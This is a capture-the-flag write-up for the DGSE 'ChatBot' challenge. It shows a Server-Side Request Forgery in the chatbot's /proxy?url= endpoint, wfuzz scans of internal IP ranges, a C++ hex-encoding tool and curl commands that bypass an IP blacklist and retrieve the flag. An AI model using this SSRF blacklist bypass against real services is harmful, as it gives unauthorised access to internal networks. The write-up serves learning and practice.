Writeup DGSE - CTF - ChatBot

This article describes my solution for the 100-point challenge called “ChatBot”.

Introduction

EvilGouv a récemment ouvert un service de chat-bot, vous savez ces trucs que personne n'aime. Bon en plus d'être particulièrement nul, il doit forcément y avoir une faille.
Trouvez un moyen d'accéder à l'intranet!
Lien : http://challengecybersec.fr/b34658e7f6221024f8d18a7f0d3497e4
Indice : Réseau local
Le flag est de la forme : DGSESIEE{x} avec x un hash

Start

So we have a chatbot to which we can send 3 default messages: “Hello”, “Job list” and “How to apply”.

Sending “Hello” or “Job List” doesn’t do anything special. It’s when we send “How to apply” that it becomes interesting. The robot tells us that we can browse https://www.qwant.com their administration and apply.

I noticed that, as soon as there was a link in a message (surely a regular expression that must match), a HTTP request is executed on the URL in question by appending a query string (/proxy?url=) into the URL. For example, if we send https://google.fr, the following request is executed.

https://challengecybersec.fr/b34658e7f6221024f8d18a7f0d3497e4/proxy?url=https://google.fr

So we have some information, including:

A clue which is: local area network (this refers to IP addresses with a /24 network mask)?
The rebot behind the chatbot makes HTTP requests as soon as it detects that an URL has been sent to it.

Exploitation

The first thing that comes to my mind is to send successively all the IP addresses of a local network and see what is returned. For this, I will use wfuzz, the web fuzzer. On Arch Linux, simply install the wfuzz package.

Generate the IP address set

Here’s how I generated all the IP addresses of a local network (usually 192.168.1.0/24).

for i in (seq 1 255); echo 192.168.1.$i; end > ip.txt

Fuzz

Now that we have our IP addresses, we can launch our attack.

wfuzz -u "https://challengecybersec.fr/b34658e7f6221024f8d18a7f0d3497e4/proxy?url=http://FUZZ" -w ip.txt
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: https://challengecybersec.fr/b34658e7f6221024f8d18a7f0d3497e4/proxy?url=http://FUZZ
Total requests: 255

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000001:   403        0 L      1 W        9 Ch        "192.168.1.1"
000000003:   403        0 L      1 W        9 Ch        "192.168.1.3"
000000007:   403        0 L      1 W        9 Ch        "192.168.1.7"
000000015:   403        0 L      1 W        9 Ch        "192.168.1.15"
000000031:   403        0 L      1 W        9 Ch        "192.168.1.31"
000000050:   403        0 L      1 W        9 Ch        "192.168.1.50"
000000049:   403        0 L      1 W        9 Ch        "192.168.1.49"
000000048:   403        0 L      1 W        9 Ch        "192.168.1.48"

The HTTP code returned is always the same: 403. So it’s not great. At that time I was a bit stuck because I couldn’t know if my exploit was working or not. I also tried with the IP address range 192.168.0.1, and always the same HTTP code.

To get back to the basics, I tried to understand what the flaw behind this type of exploitation could be. It turns out it’s called a Server-Side Request Forgery (SSRF). Looking at what was being done as exploitation with an SSRF flaw, I came across a list of techniques to bypass blacklist systems. The first one I’m trying is to change the data encoding: from a base 10 to a base 16. Turns out that computers can understand IP addresses when they are hexadecimal encoded.

IP address conversion

To transform my IP addresses into base 16, I wrote the following C++ code. It’s pretty simple, the first parameter I pass is an IP address. Its hexadecimal notation is returned.

#include <arpa/inet.h>
#include <iostream>
#include <string.h>

using namespace std;

void reverse(char* str) {
	int l = 2;
	int r = strlen(str) - 2;
	
	while (l < r) {
		swap(str[l++], str[r++]);
		swap(str[l++], str[r]);
		r = r - 3;
	}
}

void ipToHexa(int addr) {
	char str[15];
	sprintf(str, "0x%08x", addr);
	reverse(str);
	cout << str << "\n";
}

int main(int argc, char *argv[]) {
	std::string str = "default";
	if (argc > 1) { str = argv[1]; }
	int addr = inet_addr(argv[1]);
	ipToHexa(addr);
	return 0;
}

Compile it.

g++ ip.cpp -o ip

Test it.

./ip 192.168.1.1
0xc0a80101

Generation of IP addresses in base 16

for i in (seq 1 255); ./ip 192.168.1.$i ; end > encoded_ip.txt

Fuzz again

Let’s try again to launch the previous attack with our IP addresses encoded in base 16.

wfuzz -u "https://challengecybersec.fr/b34658e7f6221024f8d18a7f0d3497e4/proxy?url=http://FUZZ" -w encoded_ip.txt --sc 200
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: https://challengecybersec.fr/b34658e7f6221024f8d18a7f0d3497e4/proxy?url=http://FUZZ
Total requests: 255

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000070:   200        0 L      36 W     1052 Ch     "0xc0a80046"

I only show the result that has a 200 HTTP code (via --sc 200) and it’s 0xc0a80046. Let’s see what is displayed at this URL.

curl -sSf "https://challengecybersec.fr/b34658e7f6221024f8d18a7f0d3497e4/proxy?url=http://0xc0a80046"
{"contents":"<!DOCTYPE html>\n<html>\n\n<head>\n  <meta charset=\"utf-8\">\n  <meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\">\n  <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\">\n  <link href=\"/35e334a1ef338faf064da9eb5f861d3c/fontawesome/css/all.min.css\" rel=\"stylesheet\">\n  <link href=\"/35e334a1ef338faf064da9eb5f861d3c/bootstrap/css/bootstrap.min.css\" rel=\"stylesheet\">\n  <link href=\"/35e334a1ef338faf064da9eb5f861d3c/css/style_index.css\" rel=\"stylesheet\">\n  <link rel=\"icon\" href=\"/35e334a1ef338faf064da9eb5f861d3c/img/favicon.ico\" />\n  <title>Evil Gouv intranet</title>\n</head>\n\n<body>\n  <div>\n    <h1>FLAG DGSESIEE{2cf1655ac88a52d3fe96cb60c371a838}</h1>\n</div>\n</body>\n<script src=\"/35e334a1ef338faf064da9eb5f861d3c/js/jquery-3.5.1.min.js\"></script>\n<script src=\"/35e334a1ef338faf064da9eb5f861d3c/js/popper.min.js\"></script>\n<script src=\"/35e334a1ef338faf064da9eb5f861d3c/js/bootstrap.min.js\"></script>\n\n</html>","title":"Evil Gouv intranet","icon":"Null"}

It looks a lot like HTML code. Here is what it looks like if you filter on the element we are looking for.

curl -sSf "https://challengecybersec.fr/b34658e7f6221024f8d18a7f0d3497e4/proxy?url=http://0xc0a80046" | grep -oE "DGSESIEE{.*?}" | cut -d '<
' -f 1
DGSESIEE{2cf1655ac88a52d3fe96cb60c371a838}

We managed to bypass the blacklist system by encoding the IP address in base 16 and validate this challenge.